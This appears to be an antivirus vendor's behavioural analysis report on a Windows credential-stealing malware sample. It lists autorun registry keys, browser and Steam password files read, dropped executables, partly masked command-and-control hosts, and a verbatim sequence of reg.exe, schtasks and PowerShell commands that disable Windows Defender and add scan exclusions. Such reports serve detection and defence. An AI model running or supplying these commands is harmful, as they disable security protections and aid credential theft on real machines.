Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Shell Extension' = '%ALLUSERSPROFILE%\service.exe'
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Defender
Injects code into
the following system processes:
- %WINDIR%\microsoft.net\framework\v4.0.30319\applaunch.exe
Reads files which store third party applications passwords
- %ProgramFiles(x86)%\steam\config\config.vdf
- %ProgramFiles(x86)%\steam\config\dialogconfig.vdf
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %APPDATA%\opera software\opera stable\login data
- %HOMEPATH%\desktop\lisp_success.doc
Modifies file system
Creates the following files
- %TEMP%\avd.bat
- %TEMP%\svchost.exe
- %TEMP%\conhost.exe
- %TEMP%\winboost.exe
- %ALLUSERSPROFILE%\microsoftsystemdata\mib.bin
- %TEMP%\mib.bin
- C:\mib.bin
- %ALLUSERSPROFILE%\service.exe
Deletes the following files
- %TEMP%\winboost.exe
Network activity
Connects to
- '77.##.134.24':80
- 'ap#.ip.sb':443
- 'cd#.#ilesend.jp':443
- 'db#########7b6d3480fe5220fdd58b38bf.xyz':80
- 'db#########7b6d3480fe5220fdd58b38bf.xyz':443
- 'pa###bin.com':443
- '19#.#49.180.212':443
- 'microsoft.com':80
TCP
HTTP GET requests
- http://db#########7b6d3480fe5220fdd58b38bf.xyz/API/2/configure.php?cf############
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
Other
- '77.##.134.24':80
- 'ap#.ip.sb':443
- 'cd#.#ilesend.jp':443
- 'db#########7b6d3480fe5220fdd58b38bf.xyz':443
- 'pa###bin.com':443
UDP
- DNS ASK ap#.ip.sb
- DNS ASK cd#.#ilesend.jp
- DNS ASK db#########7b6d3480fe5220fdd58b38bf.xyz
- DNS ASK pa###bin.com
- DNS ASK microsoft.com
Miscellaneous
Creates and executes the following
- '%TEMP%\svchost.exe'
- '%TEMP%\conhost.exe'
- '%TEMP%\winboost.exe'
- '%ALLUSERSPROFILE%\service.exe'
- '%WINDIR%\syswow64\cmd.exe' /c (ping 127.0.0.1) & (del /F /Q "%TEMP%\winboost.exe") & (start "" "%ALLUSERSPROFILE%\service.exe")' (with hidden window)
Executes the following
- '%WINDIR%\microsoft.net\framework\v4.0.30319\applaunch.exe'
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\RuntimeBroker"
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\avd.bat" "
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\cmd.exe' /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\RuntimeBroker" & powershe...
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1
- '%WINDIR%\syswow64\chcp.com' 1251
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\cmd.exe' /c (ping 127.0.0.1) & (del /F /Q "%TEMP%\winboost.exe") & (start "" "%ALLUSERSPROFILE%\service.exe")
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\MicrosoftSystemData"
